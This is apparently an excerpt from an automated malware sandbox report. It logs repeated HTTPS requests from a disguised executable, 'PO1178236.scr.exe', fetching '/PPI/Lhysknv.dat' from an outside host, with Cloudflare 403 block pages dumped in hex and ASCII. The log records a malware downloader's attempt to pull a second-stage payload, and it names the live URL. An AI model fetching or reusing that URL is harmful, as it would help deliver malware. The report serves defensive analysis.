        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:48 UTC1369INData Raw: 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64
        Data Ascii: dflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=d
        2025-01-09 07:36:48 UTC1369INData Raw: 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61
        Data Ascii: n cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.ca
        2025-01-09 07:36:48 UTC1369INData Raw: 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 32 34 66 39 66 32 63 33 35 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
        Data Ascii: t-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c224f9f2c35e</strong></span> <span class="cf-footer-separator sm:hidde
        2025-01-09 07:36:48 UTC1001INData Raw: 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 32 34 66 39 66 32 63 33 35 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61
        Data Ascii: indow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c224f9f2c35e',t:'MTczNjQwODIwOC4wMDAwMDA='};va
        2025-01-09 07:36:48 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        84192.168.2.949793188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:48 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:48 UTC1017INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:48 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:03 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8s5b7flFtrkdR3y1t1m%2Bap1xEiaDVWLqjsC5TH%2FE%2FiESjCVctAOm2kMVRozH%2BuPTRXcFszLsjwyy3SgG6fCfUgZY0%2B1ihN%2F8Uzb7mDLxdwID2Yxs%2ByROg%2F7JoG2%2BzaZTjmC8R9uDo4wDNQH8"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c228a9b772ab-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1958&rtt_var=747&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1452736&cwnd=208&unsent_bytes=0&cid=b72691966784d94f&ts=133&x=0"
        2025-01-09 07:36:48 UTC352INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:48 UTC1369INData Raw: 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74
        Data Ascii: d! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content
        2025-01-09 07:36:48 UTC1369INData Raw: 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e
        Data Ascii: cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>
        2025-01-09 07:36:48 UTC1369INData Raw: 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 32 38 61 39 62 37 37 32 61 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72
        Data Ascii: er sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c228a9b772ab</strong></span> <span class="cf-footer-separator
        2025-01-09 07:36:48 UTC1010INData Raw: 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 32 38 61 39 62 37 37 32 61 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4f 43 34 77 4d 44 41 77
        Data Ascii: ript> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c228a9b772ab',t:'MTczNjQwODIwOC4wMDAw
        2025-01-09 07:36:48 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        85192.168.2.949794188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:49 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:49 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:49 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:04 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAvPDvvifCrgwSlZ0YS%2BRpGWKM3DTsdLCE8NnBydq7mejeo07f%2F55HPr0Tc2ebyzgfOJhcVV23z8KKAZIVB59KD9q1tSE7GDP3J29bGj6GYIch%2BTodX1CPQtiZ51ErvcssBlWcSzUoo5ZoMd"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c22c9f167293-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1943&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1471774&cwnd=158&unsent_bytes=0&cid=c45dab2a07ae45cf&ts=151&x=0"
        2025-01-09 07:36:49 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:49 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:49 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:49 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 32 63 39 66 31 36 37 32 39 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c22c9f167293</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:49 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 32 63 39 66 31 36 37 32 39 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c22c9f167293',t:'MTczNjQwODIwOS4wMDAwMDA='};var a
        2025-01-09 07:36:49 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        86192.168.2.949795188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:49 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:49 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:49 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:04 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RiE0an4sR%2Fc8qvZ2LH0iUo3fn3loQVQLIL6Y4uIj633CD38RdW%2FCRyNlTo%2BYs2F8QOfZhVBSc76PZV32T5p236Xi8qnG8M4a8govnzreK2Ic1agosUcqLmOOHzXZnlfU1eVHlXYgeFx%2BwHB"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2303ad3c360-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1494&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1931216&cwnd=138&unsent_bytes=0&cid=c1084e721b5046c6&ts=119&x=0"
        2025-01-09 07:36:49 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:49 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
